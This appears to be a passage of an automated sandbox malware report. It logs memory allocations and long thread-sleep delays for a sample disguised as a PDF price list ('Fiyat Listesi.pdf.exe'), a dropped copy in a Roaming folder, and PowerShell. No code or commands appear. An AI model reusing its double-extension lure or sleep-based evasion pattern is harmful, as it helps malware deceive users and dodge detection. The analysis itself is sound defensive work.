                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 7870000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 8870000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 8A10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 9A10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 1390000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2F20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2E20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399883Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399765Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399638Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399531Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399422Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399312Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399203Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399094Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398984Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398874Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398765Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398663Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398547Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398393Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398161Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398031Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397921Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397812Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397703Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397594Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397484Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397375Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397264Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397156Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397046Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396937Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396828Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396718Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396609Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396500Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396390Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396281Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396172Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396047Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2395937Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2395828Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2395718Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2395424Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2395297Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2395187Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2395078Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394968Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394859Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394750Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394640Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394531Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394421Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394312Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394203Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399367Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399262Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399046Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398499Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398171Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398062Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397843Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397732Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397625Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397511Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397265Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397046Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396834Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396593Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396484Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396265Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396046Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395827Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395499Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395171Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395062Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394843Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394733Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394625Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394296Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394187Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394077Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399891
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399766
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399657
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399532
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399422
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399313
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399188
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399063
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398938
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398813
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398703
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398469
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398360
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398235
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398110
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397989
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397860
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397744
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397625
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397516
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397391
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397281
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397172
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397063
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396947
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396609
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396391
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396280
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396172
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396063
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395953
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395844
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395610
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395485
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395360
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395235
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395110
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394985
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394860
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394610
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394391
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394266
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5645Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4079Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWindow / User API: threadDelayed 2585Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWindow / User API: threadDelayed 7262Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 3301Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 6552Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 8056
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 1781
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7640Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7988Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep count: 37 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2400000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7996Thread sleep count: 2585 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399883s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7996Thread sleep count: 7262 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399638s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398874s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398663s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398393s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398161s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397264s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2395937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2395828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2395718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2395424s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2395297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2395187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2395078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394968s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394421s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394203s >= -30000sJump to behavior
